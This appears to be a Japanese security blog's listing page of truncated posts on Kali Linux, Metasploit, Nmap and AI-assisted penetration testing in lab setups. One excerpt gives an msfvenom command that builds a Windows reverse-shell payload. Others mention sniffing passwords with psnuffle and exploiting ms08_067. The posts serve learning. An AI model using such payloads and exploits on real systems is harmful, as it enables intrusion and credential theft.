Hello there, ('ω')ノ 第5回のテーマ AI と人間の正しい役割分担 AI は非常に優秀ですが、 すべてを任せてよい存在ではありません。 侵入テストでは特にこの線引きが重要です。 1️⃣ AI に任せてよいこと ✅ 情報収集・整理 AI が最も力を発揮するのはここで…

Hello there, ('ω')ノ 第4回のテーマ 初動調査を AI に丸投げする 侵入テストの最初のフェーズでは、次のことを行います。 対象ホストの把握 開いているサービスの洗い出し 攻撃対象の候補を絞る これらを 人間はほぼ何も考えず、AI に任せます。 1️⃣ 前提…

Hello there, ('ω')ノ 第3回のテーマ 調査の優先順位を決める 侵入テストで一番難しいのは 「どこから手を付けるか」です。 今回は以下を試します。 危険度が高いポイントの特定 次の調査ステップの提案 なぜそれを選んだかの説明 1️⃣ まずは率直に聞く 指…

Hello there, ('ω')ノ 第2回のテーマ 脆弱性がありそうかを調べる 目的は以下です。 既知の脆弱性がないか 設定ミスっぽいところはあるか 深掘りすべきポイントはどこか 1️⃣ まずは素直に聞いてみる 指示（英語） check this host for common vulnerabilit…

Hello there, ('ω')ノ 第1回のテーマ 「とにかく何が動いているか知りたい」 初心者がまずやりたいのはこれです。 どのホストが生きている？ どのポートが開いている？ 何のサービスが動いている？ 1️⃣ まずは超シンプルな指示 指示（英語） scan my local …

Hello there, ('ω')ノ Kali Linux に新しく登場した llm-tools-nmap は、従来コマンドで操作する必要があった Nmap を 自然言語（英語の文章）で指示できるようにするツールです。これにより、Nmap のようなネットワークスキャンツールの学習・利用がずっと…

Hello there, ('ω')ノ VirtualBoxにOVAファイルをインポートするだけで、Kali上で複数のWEBアプリ脆弱性診断用テスティングサイトが一通り使える環境を作りました。 トレーニング目的で使う分には十分実用的で、導入が簡単なのが最大のメリットです。以下、…

Hello there, ('ω')ノ サイバーセキュリティの世界は複雑で専門用語が多く、非エンジニアの方にとっては少しとっつきにくいかもしれません。でも、実は基本的な考え方を押さえておくと、サイバー攻撃がどんなふうに行われるのか、どうやって守ればいいのかが…

Hello there, ('ω')ノ Kali Linuxをアップデートしようとすると下記のようなエラーが。 どうやらハッシュ値が異なるようで。 対応するのが面倒だったので、他に仮想環境を構築してみることに。 それでも同じエラーが。 Parott Securityでも同じエラーが。 た…

Hello there, ('ω')ノ デジタルフォレンジックツールでデータをテストするために。 NickMikusの作成したイメージを利用することができて。 http://dftt.sourceforge.net/test11/index.html 他には下記のサイトにも。 http://dftt.sourceforge.net/ さらには…

Hello there, ('ω')ノ フォレンジック取得とハッシュに使用されるツールで。 国防総省サイバー犯罪センターのデータダンプ（dc3dd）があって。 dc3ddは、データダンプ（DD）ツールのパッチで。 なので、DDが更新されるたびに定期的に更新されて。 他のツール…

Hello there, ('ω')ノ まずは、攻撃者となるKali LinuxのIPアドレスの確認から。 今回は、Windowsのリバースシェルペイロードを作成することに。 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.24 LPORT=4444 -f exe -o payload.exe 作成し…

Hello there, ('ω')ノ まずは、AWS S3バケットをスキャンするツールのインストールから。 sudo pip3 install s3scanner AWSのコマンドライン機能の設定を。 aws configure aws configureaws /home/kali/Pictures/Screenshot_2022-0 Webサイトのホスティング…

Hello there, ('ω')ノ 今回は、KingstonのUSBで。 USBは、256GBのGen2対応を。 Kali LinuxのLive USBの作る際には。 下記よりliveバージョンをダウンロードしてから。 ダウンロードがなかなかできないときは、アーカイブサイトからダウンロードして。 https:…

Hello there, ('ω')ノ Parrotのターミナルが気になったので、Kaliでもと。 まずは、下記へアクセスして、ファイルをダウンロードして。 bit.ly/kali-theme 現在の.bashrcの名前を.bashrc_oldに変更してから。 ダウンロードしたファイルを移動させて.bashrcへ…

Hello there, ('ω')ノ まずは、おきまりのapt updateをしてから。 公式のDocker PGPキーを追加して。 次にaptを構成して、Dockerをダウンロード、インストール、更新できるようにして。 Dockerをaptに追加したら、aptをもう一度更新しておいて。 apt update …

Hello there, ('ω')ノ 本日もKali Linuxに振り回され、やりたいことができず。 今年の春前あたりからOVAファイルを仮想環境にインポートして使い始めると。 これまでとはデフォルトのログインIDもパスワードも変更となって。 armitageもメニューから削除され…

Hello there, ('ω')ノ 昨日の夕刻に国からの指摘をうけて急遽、ホームページを新規作成することに。 指摘から24時間内になんとか対応したもののすでにヘトヘト状態で。 metasploit frameworkの使い方も少しはわかったところで。 どのようなストーリーで使用…

Hello there, ('ω')ノ このところ、ずっとブルースクリーンによる作業の中断が気にかかり。 おもいきってWindowsを初期化することに。 これでダメならSSDの交換までやってみようかと。 さっそく、VirtualboxをインストールしてKali LinuxのOVAファイルをイン…

Hello there, ('ω')ノ 昨夜からドツボにはまってしまって。 msfconsoleで、postgresqlに接続できなくて。 postgresqlの状態を確認しても問題ないのですが。 msfconsoleを起動して、db_statusで確認すると下記のメッセージが。 postgresql selected no connec…

Hello there, ('ω')ノ 本日は終日、ブルースクリーンの対応で。 どうしてもVirtual BoxでKali Linuxを使用していると発生して。 一度、発生すると頻繁に発生して作業が止まって。 一応、Kali Linuxの専用にPCを用意したものの仮想環境が便利な時もあってつい…

Hello there, ('ω')ノ armitageをしばらく使っていなかったら少々仕様もかわっていて。 さらにはKali Linuxにもインストールされておらず。 起動方法も少し手間になったような。 armitageの起動前には下記のデータベースの初期化や起動が必要で。 sudo msfdb…

Hello there, ('ω')ノ Armitageを起動する前にPostgreSQLとMetasploitを起動して。 Armitageを起動して。 インストールされていなかったので、インストールすることに。 以前は、Kali Linuxのメニューにあったような。 インストールするとメニューからも起動…

Hello there, ('ω')ノ Meterpreterは、メモリ内DLLインジェクションを使用する拡張可能なペイロードで。 まずは、下記コマンドでLHOSTを設定してMeterpreterペイロードを構成してから。 次にms08_067_netapiで脆弱性を取得するものの。 Linux向けに実行して…

Hello there, ('ω')ノ Metasploit Frameworkの補助モジュールにMS12_020_checkというものがあって。 これは、下記の脆弱性に対して脆弱かどうかを確認するもので。 MS12-020： リモート デスクトップの脆弱性により、リモートでコードが実行される 危険度: :…

Hello there, ('ω')ノ Network Mapper（NMAP）を使うと以下のようなことができるツールで。 ホスト発見サービス バージョンの検出 列挙 脆弱性スキャン ファイアウォールのテストと回避 Metasploit Framework内でもNMAPスキャンを開始することもできて。 ス…

Hello there, ('ω')ノ Metasploit Frameworkは、デフォルトでバックエンドのPostgreSQLを使用して。 必要なすべての情報を保存および取得できて。 まずは、下記のコマンドで、Kali LinuxでPostgreSQLを開始して。 sudo service postgresql start 次に下記の…

Hello there, ('ω')ノ ネットワークからパスワードを盗聴するpsnuffleというモジュールを実行すると。 『failed』といった嫌な文字が。 実行権限について問われているようで。 これまでのKali Linuxは、ルート権限でログインしたいたものの。 最新版ではユー…

Hello there, ('ω')ノ まずは、Metasploitable2を起動してIPアドレスを確認して。 Kali Linuxでmsfconsoleを起動して軽くウォーミングアップして。 tcpモジュールは、ポートスキャンを実行して開いているTCPポートを通知してくれて。 補助モジュール名：auxi…

Hello there, ('ω')ノ Metasploit Frameworkは、単なるコマンドラインインターフェイスで。 なので、コマンドラインコンソール（msfconsole）を習得する必要があって。 bannerコマンド：msf> banner Metasploitのを表示するために使用されるシンプルなコマン…